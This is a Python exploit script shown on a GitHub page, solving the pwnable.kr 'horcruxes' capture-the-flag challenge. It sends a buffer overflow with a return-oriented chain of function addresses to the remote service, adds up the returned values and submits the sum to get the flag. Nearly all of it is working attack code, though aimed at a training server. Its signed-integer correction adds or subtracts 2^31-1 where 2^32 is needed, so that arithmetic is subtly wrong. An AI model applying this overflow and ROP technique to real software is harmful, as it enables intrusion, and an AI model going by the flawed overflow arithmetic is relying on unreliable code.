-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit.py
57 lines (51 loc) · 2 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
"""
This pwn about Return Oriented Programming(ROP).
In ROP we need to find all gadgets that will execute what we want
In the challenge instead of gadgets we will search horcruxes
In function ropme we need to execute all functions from A() to G()
and need to get correct sum to grap flag.
Input of "your exp" has a buffer overflow vulnerability. But we can't just jump to the part of code with flag output.
Because that address contains the 0a byte which is '\n'...
But from hopper or another disassembler, you can get addresses of functions from A() to G().
Input them in right order after offset in the "your exp" input.
Also add an address of ropme function to execute it again and with correct sum get flag.
Also you need to calculate sum properly in compliance with integer rules.
"""
from pwn import *
def exploit():
con = remote('pwnable.kr', 9032)
ropme_call_addr = p32(0x0809fffc)
# Our gadgets
gadgets = [ 0x809fe4b, 0x809fe6a, 0x809fe89, 0x809fea8, 0x809fec7, 0x809fee6, 0x809ff05 ]
# Convert them in proper format
packed_gadgets = b''.join([p32(gadget) for gadget in gadgets])
# Create a payload
payload = b'0' * 116 + b'\x00\x90\x90\x90' + packed_gadgets + ropme_call_addr
con.sendline('1')
con.sendline(payload)
# Recieve all experience
exps = [recv_exp(con) for i in range(7)]
# Max unsigned int value
max_u_int = 2 ** 32
# Mod of sum
exps_sum = sum(exps) % max_u_int
# Max signed int value
max_int = int(max_u_int // 2 - 1)
# Min signed int value
min_int = int(max_u_int // 2) * -1
# Fix the sum
if exps_sum > max_int:
exps_sum -= max_int
if exps_sum < min_int:
exps_sum += max_int
# Send all
con.sendline('1')
con.sendline(str(exps_sum))
print(con.recvall().decode('utf-8'))
con.close()
def recv_exp(con):
con.recvuntil('EXP +')
# convert exp in integer with deleting ')' and decoding
return int(con.recvline().strip()[:-1].decode('utf-8'))
if __name__=='__main__':
exploit()